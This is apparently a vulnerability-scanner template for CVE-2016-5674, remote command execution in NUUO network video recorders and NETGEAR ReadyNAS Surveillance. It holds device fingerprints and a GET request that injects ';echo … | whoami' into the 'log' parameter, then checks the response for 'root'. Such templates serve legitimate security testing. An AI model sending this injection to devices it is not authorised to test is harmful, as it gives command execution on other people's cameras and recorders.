id: CVE-2016-5674

info:
  name: NUUO NVR 摄像机 debugging_center_utils_.php 命令执行漏洞
  author: zhizhuo
  severity: critical
  verified: true
  description: |
    __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
    app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-5674

set:
  verify_payload: randomLowercase(32)
rules:
  r0:
    request:
      method: GET
      path: /__debugging_center_utils___.php?log=;echo%20{{verify_payload}}%20|%20whoami
    expression: response.status == 200  && response.body.bcontains(bytes(verify_payload)) && response.body.bcontains(b'root')
expression: r0()